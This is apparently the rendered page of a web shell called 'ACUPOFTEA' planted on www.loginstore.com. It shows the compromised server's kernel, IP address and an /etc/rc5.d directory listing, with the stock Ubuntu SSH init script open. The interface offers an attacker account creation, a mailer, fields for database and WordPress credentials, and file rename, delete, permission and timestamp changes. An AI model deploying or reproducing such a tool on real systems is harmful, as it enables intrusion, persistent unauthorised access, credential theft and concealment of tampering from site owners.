System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
190.119.170.206
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
etc
/
rc5.d
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
S01ssh
#! /bin/sh ### BEGIN INIT INFO # Provides: ssh sshd # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: OpenBSD Secure Shell server ### END INIT INFO set -e # /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon test -x /usr/sbin/sshd || exit 0 ( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0 umask 022 if test -f /etc/default/ssh; then . /etc/default/ssh fi . /lib/lsb/init-functions if [ -n "$2" ]; then SSHD_OPTS="$SSHD_OPTS $2" fi # Are we running from init? run_by_init() { ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ] } check_for_no_start() { # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists if [ -e /etc/ssh/sshd_not_to_be_run ]; then if [ "$1" = log_end_msg ]; then log_end_msg 0 || true fi if ! run_by_init; then log_action_msg "OpenBSD Secure Shell server not in use (/etc/ssh/sshd_not_to_be_run)" || true fi exit 0 fi } check_dev_null() { if [ ! -c /dev/null ]; then if [ "$1" = log_end_msg ]; then log_end_msg 1 || true fi if ! run_by_init; then log_action_msg "/dev/null is not a character device!" || true fi exit 1 fi } check_privsep_dir() { # Create the PrivSep empty dir if necessary if [ ! -d /run/sshd ]; then mkdir /run/sshd chmod 0755 /run/sshd fi } check_config() { if [ ! -e /etc/ssh/sshd_not_to_be_run ]; then # shellcheck disable=SC2086 /usr/sbin/sshd $SSHD_OPTS -t || exit 1 fi } export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" case "$1" in start) check_privsep_dir check_for_no_start check_dev_null log_daemon_msg "Starting OpenBSD Secure Shell server" "sshd" || true # shellcheck disable=SC2086 if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; stop) log_daemon_msg "Stopping OpenBSD Secure Shell server" "sshd" || true if start-stop-daemon --stop --quiet --oknodo --pidfile /run/sshd.pid --exec /usr/sbin/sshd; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; reload|force-reload) check_for_no_start check_config log_daemon_msg "Reloading OpenBSD Secure Shell server's configuration" "sshd" || true if start-stop-daemon --stop --signal 1 --quiet --oknodo --pidfile /run/sshd.pid --exec /usr/sbin/sshd; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; restart) check_privsep_dir check_config log_daemon_msg "Restarting OpenBSD Secure Shell server" "sshd" || true start-stop-daemon --stop --quiet --oknodo --retry 30 --pidfile /run/sshd.pid --exec /usr/sbin/sshd check_for_no_start log_end_msg check_dev_null log_end_msg # shellcheck disable=SC2086 if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; try-restart) check_privsep_dir check_config log_daemon_msg "Restarting OpenBSD Secure Shell server" "sshd" || true RET=0 start-stop-daemon --stop --quiet --retry 30 --pidfile /run/sshd.pid --exec /usr/sbin/sshd || RET="$?" case $RET in 0) # old daemon stopped check_for_no_start log_end_msg check_dev_null log_end_msg # shellcheck disable=SC2086 if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; 1) # daemon not running log_progress_msg "(not running)" || true log_end_msg 0 || true ;; *) # failed to stop log_progress_msg "(failed to stop)" || true log_end_msg 1 || true ;; esac ;; status) status_of_proc -p /run/sshd.pid /usr/sbin/sshd sshd && exit 0 || exit $? ;; *) log_action_msg "Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart|try-restart|status}" || true exit 1 esac exit 0
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-12-01 06:48:06
..
DIR
-
drwxr-xr-x
2026-08-05 06:57:20
K01apache-htcacheclean
text/x-shellscript
2.43 KB
-rwxr-xr-x
2023-12-04 06:58:09
S01apache2
text/x-shellscript
7.99 KB
-rwxr-xr-x
2023-12-04 06:58:10
S01apport
text/x-shellscript
2.85 KB
-rwxr-xr-x
2025-05-22 08:40:36
S01console-setup.sh
text/x-shellscript
1.2 KB
-rwxr-xr-x
2021-11-22 04:39:53
S01cron
text/x-shellscript
2.99 KB
-rwxr-xr-x
2021-03-17 11:14:10
S01dbus
text/x-shellscript
3.08 KB
-rwxr-xr-x
2021-06-28 12:15:25
S01grub-common
text/x-shellscript
985 B
-rwxr-xr-x
2022-12-02 03:18:47
S01irqbalance
text/x-shellscript
2.58 KB
-rwxr-xr-x
2021-10-30 10:55:55
S01lvm2-lvmpolld
text/x-shellscript
586 B
-rwxr-xr-x
2021-05-19 10:19:25
S01mysql
text/x-shellscript
5.48 KB
-rwxr-xr-x
2023-06-14 07:23:16
S01open-vm-tools
text/x-shellscript
1.8 KB
-rwxr-xr-x
2023-11-30 12:10:47
S01plymouth
text/x-shellscript
1.35 KB
-rwxr-xr-x
2022-02-23 02:15:41
S01proftpd
text/x-shellscript
5.2 KB
-rwxr-xr-x
2021-09-18 09:52:24
S01rsync
text/x-shellscript
4.31 KB
-rwxr-xr-x
2022-10-11 10:37:36
S01ssh
text/x-shellscript
3.96 KB
-rwxr-xr-x
2023-01-11 11:09:13
S01unattended-upgrades
text/x-shellscript
1.36 KB
-rwxr-xr-x
2021-02-19 12:11:42
S01uuidd
text/x-shellscript
1.28 KB
-rwxr-xr-x
2022-02-21 01:49:57
S01vsftpd
text/x-shellscript
2.02 KB
-rwxr-xr-x
2024-07-11 12:59:43
~ ACUPOFTEA - www.loginstore.com